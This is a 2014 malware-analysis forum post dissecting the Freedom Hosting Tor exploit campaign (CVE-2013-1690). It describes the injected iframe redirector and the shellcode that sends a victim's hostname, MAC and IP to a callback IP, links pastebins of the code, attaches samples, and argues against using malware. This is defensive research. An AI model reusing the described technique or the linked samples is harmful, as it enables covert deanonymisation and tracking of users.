A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #23603  by unixfreaxjp
 Wed Aug 13, 2014 1:25 pm
Background:

This is purely a case of state sponsored case malware, it was search warrant backing up the domain name spotted to be infected.
Infection runs in Onionland on FreeHosting website(s) in 2013, with the purpose to aim child porn suspects with the method of mass-driven by download. The court documentation was spotted recently in 2014 to legitimate the usage of mass-infection technique for the purpose to search (investigation details) by the regular search warrant signed by district court of Nebraska, US.

Details of malware, its distribution & purpose:

1. These are the variant of codes implemented to infect, injected in the Freedom Hosting site in some pages, are the malicious Javascript Iframer, w/condition aimed are Firefox (browser) and Windows/NT (OS), noted the cookie method used and the callback.
http://pastebin.com/bu2Ya0n6

2. One of the above codes is redirecting visitor to specific .onion "infector" site stated in above point (1), using malicious onfuscated Javascript to exploit the (at that time) vulnerable version of Firefox with 0day CVE-2013-1690 in order to infect the payload (a shellcode) to , while one of the codes were sending beacon for the infection initiation to:
Code: Select all
 IP Address: 65.222.202.53
  City: Triadelphia
  State or Region: West Virginia
  Country: United States
  ISP: Verizon Business
  Latitude & Longitude: 40.0900-80.6220
  Domain: verizonbusiness.com
  ZIP Code: 26059
The infector script w/ some debfuscation we researched in here: http://pastebin.com/RTwsyrH8

3. The above obfuscated Javascript (2), was exploiting Firefox (that time's) 0day to gain arbitrary permission to execute malicious shellcode (under environment Win x32 ) to perform the malicious verdict as per following details, and here is the analysis of the shellcode using radare as per snipped in the pic below.
Image
The 0day exploitation can be viewed by the below reference and not a subject to be discussed:
https://cve.mitre.org/cgi-bin/cvename.c ... -2013-1690
https://bugzilla.mozilla.org/show_bug.cgi?id=901365
https://www.mozilla.org/security/announ ... 13-53.html
The shellcode analysis can be viewed here: http://pastebin.com/aFUP2gLB following by the behavior test to confirm the reversed information, to avoid false positive in verdict.

4. With the method of (1) Crafting shellcode into exe + run it and (2) simulation of infection with the Firefox Tor Bundled, can positively reproduced the CNC callback as per snapshot below:
Image
With calling to the neighbor IP of the callback IP stated above to the ghost network of:
Code: Select all
65.222.202.54 ASN: 701 / UUNET 
Prefix: 65.192.0.0/11 
Vienna, Virginia, United States, North America
 38.9012,-77.2653 Verizon Business
5. The malicious activity verdict:
The malicious hidden IFRAME redirector driven by javascript, which are implemented in some pages under the Freedom Hosting site in a Tor network (together with the same server as TorMail), is redirecting users matching to criteria Windows OS and Firefox browser to the callback IP or specific .onion domain to 0day exploit (CVE-2013-1690) and executing shellcode as the payload. The shellcode is sending HTTP/1.1 GET request contains specific URL with the TCP/IP packet that contains IP address and MacAddress of the infected PC. MacAddress which was grabbed by SendARP@IPHLPAPI.DLL and Hostname of infected PC grabbed by gethostbyname@WS2_32.DLL and gethostname@WS2_32.DLL in the shellcode, are sensitive unique information which needed to have a consent from the user for being sent to the remote environment, was sent.
The cookie was installed in the PCs accessing the Freedom Hosting sites, to be used for tracking scheme to match the redirected user status, was installed in PC that matched criteria described in point (1).

6. The privacy violation verdict:
After thorough investigation performed, beyond any doubt we confirmed that sensitive information (READ: PRIVACY) of multinational users can be violated by the implementation of this malware for legal investigation, in this specific case we can confirm the following violation points:
(1) Silently sending infected PC hostname,
(2) Silently sending MacAddress (attached TCP packet) and ARP
(3) IP address is sent to this remote host. ..w/o proper mention
(4) The cookie which was silently installed in infected PC can be use for tracking purpose.

7. Sample
The payload is the shellcode binary hex file, we uploaded into VT here: Payload is the shellcode, sample:
VT: https://www.virustotal.com/en/file/7441 ... 380104138/
With the detection ratio of 2/48, the file was uploaded by another researcher individual we did not know beforehand with the same hash.
For the share to the members in KM, we uploaded the samples of shellcode + crafted EXE samples.

8. The point of this report:
The point of this report is to clarify the real fact. For you to see & judge yourself as fellow malware researchers whether the usage of such mass-infected malicious can be allowed morally, or not. Once we let it happen, this method is undoubtedly will be re-used, over and over and over again, and encourage other country to do the same too, with opening the possibility that someday we we may face a wild wild west internet in the future where good people, cops and crooks are all using malware to battle each other..
Malware is bad by default and nature, it was built basically by the concept of infects-duplicates-steals-control-destroy victims, is a subject to be avoided by the good fellow. There is no one-country's law ever "enough" to allow the mass-multinational infection of it, to whatever reason.
Due to this, we MMD protesting the usage of this malware, as per posted here, as the background information: http://blog.malwaremustdie.org/2014/08/ ... d-any.html

9. Reference:
https://www.documentcloud.org/documents ... davit.html
http://www.wired.com/2014/08/operation_torpedo/
http://reason.com/blog/2014/08/06/fbi-t ... -tor-users
http://www.wowt.com/home/headlines/Fed- ... 16621.html
http://www.wired.com/2013/08/freedom-hosting/
http://xerocrypt.wordpress.com/2013/08/ ... ghty-list/
https://www.virusbtn.com/blog/2013/08_05.xml
https://krebsonsecurity.com/2013/08/fir ... porn-hunt/
https://blog.torproject.org/blog/hidden ... om-hosting

Thank you for the kindly read this report. This is the work of team effort, not individual. not only MMD.
I did the analysis of the shellcode parts (pastebin point 3), and compiling the overall evidence.
There are so many reference I picked the closest to the source, which using strict filter since the infection was realized in mid 2013, and some objects were deleted from internet.

What's bad is just bad, and malware is bad. Don't use it, there will always be more damage than good points.

Best regards

#MalwareMustDie - KernelMode rocks!
Attachments
RAR5, password: infected
Noted: Sample is shared to KM community

(1.89 KiB) Downloaded 63 times